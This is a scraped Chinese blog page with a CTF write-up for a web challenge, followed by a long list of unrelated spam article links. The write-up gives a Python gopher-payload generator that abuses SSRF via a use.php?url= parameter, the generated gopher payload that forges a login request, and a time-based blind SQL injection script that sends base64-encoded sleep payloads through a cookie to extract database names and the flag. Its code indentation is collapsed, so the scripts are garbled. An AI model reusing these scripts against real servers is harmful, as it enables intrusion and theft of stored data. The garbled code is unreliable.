当前位置: 首页 > news >正文

flash html网站模板目录网站做外链

flash html网站模板,目录网站做外链,网页制作三合一案例教程,哪里有免费网站空间申请不太会,以后慢慢看 被骗了,看见very_easy就点进来了,结果所有sql能试的全试了一点用都没有 打开源代码发现有个use.php 好家伙,这是真的在考sql吗...... 制作gopher协议的脚本: import urllib.parsehost "12…

不太会,以后慢慢看

被骗了,看见very_easy就点进来了,结果所有sql能试的全试了一点用都没有 

打开源代码发现有个use.php

好家伙,这是真的在考sql吗...... 

 制作gopher协议的脚本:

import urllib.parsehost = "127.0.0.1:80"
content = "uname=admin&passwd=admin"
content_length = len(content)test =\
"""POST /index.php HTTP/1.1
Host: {}
User-Agent: curl/7.43.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: {}{}
""".format(host,content_length,content)tmp = urllib.parse.quote(test)
new = tmp.replace("%0A","%0D%0A")
result = urllib.parse.quote(new)
print("gopher://"+host+"/_"+result)

得出来payload在网址处提交:

gopher://127.0.0.1:80/_POST%2520/index.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AUser-Agent%253A%2520curl/7.43.0%250D%250AAccept%253A%2520%252A/%252A%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252024%250D%250A%250D%250Auname%253Dadmin%2526passwd%253Dadmin%250D%250A

Set_Cookie处有YWRtaW4%3D,解码半天弄不出来,突然意识到%3D是=的意思,哎呦我这个笨蛋 

没有报错没有回显,这道题用时间盲注,注入点在cookie中(?)

时间盲注脚本:

import urllib.parse
import requests
import time
import base64url = "http://61.147.171.105:51906/use.php?url="
flag = ""
for pos in range(1, 50):for i in range(32, 127):# 猜一下回显数量#payload="') union select 1,2,if(1=1,sleep(2),1)#"# 猜数据库名字为securitypayload = "') union select 1,2,if(ascii(substr((database()),"+str(pos)+",1))="+str(i)+",sleep(2),1)#"# 猜解数据库表名为flag# poc = "') union select 1,2,if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),"+str(pos)+",1))="+str(i)+",sleep(2),1)#"# 猜解flag字段#payload = "') union select 1,2,if(ascii(substr((select * from flag),"+str(pos)+",1))="+str(i)+",sleep(2),1) #"payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')final_poc = "gopher://127.0.0.1:80/_GET%20%2findex.php%20HTTP%2f1.1%250d%250aHost%3A%20localhost%3A80%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250aCookie%3A%20this%5Fis%5Fyour%5Fcookie%3D"+payload+"%3B%250d%250a"start = time.time()requests.get(url+final_poc)end = time.time()if end-start > 2:         # 如果时间大于2秒,说明这个字符是正确的flag += chr(i)print(flag)breakelse:continue

http://www.15wanjia.com/news/176372.html

相关文章:

  • 如何做自助网站最近在线观看免费播放电视剧
  • 女性时尚网站带论坛php程序网站开发学习步骤
  • 鄂州网站建设公司wordpress josn查询
  • 建自己的o2o网站要多少钱视频解析网站建设
  • 阜阳手机端网站建设做兼职一般去哪个网站
  • 贵阳做网站需要多少钱wordpress 悬浮按钮
  • 网站开发协助方案mvc3网站上传到空间
  • 电子商务网站开发的课程介绍班级网站建设感想
  • 网站建设作业有哪些网站建设和谷歌优化
  • 肇庆高要建设局网站wordpress标签logo
  • 用vs做网站原型金山区做网站公司
  • 重庆高端网站seowordpress 文章格式化
  • 网站做编辑网站怎么制作商城
  • 网络运营与维护百度蜘蛛池自动收录seo
  • 做php网站的书有限责任公司属于什么法人
  • 邙山网站建设湖北长欣建设有限公司网站
  • 网站建设流程有几个阶段顺德网站建设哪家好
  • 网站建设的含义杭州开发网站的公司哪家好
  • 腾讯云wordpress 主机深圳抖音seo
  • 门户网站用什么程序做建设部官方网站查询
  • 如何做网站销售长沙网站搭建首选智投未来
  • 主机屋网站在那注册wordpress代码主题
  • 迈创网站建设网页设计短期培训
  • 网站弹广告是什么样做的太原百度网站建设
  • 怎么在58建设企业的网站网站主页调用
  • 如何制作自己的网站教程mvc在网站开发中的应用
  • 微信公众号授权给网站app软件制作网站
  • 给网站设置关键词互联网技术公司
  • 一般网站用什么软件做网站建设售后
  • 西安网站制作公司有哪家网站运营方案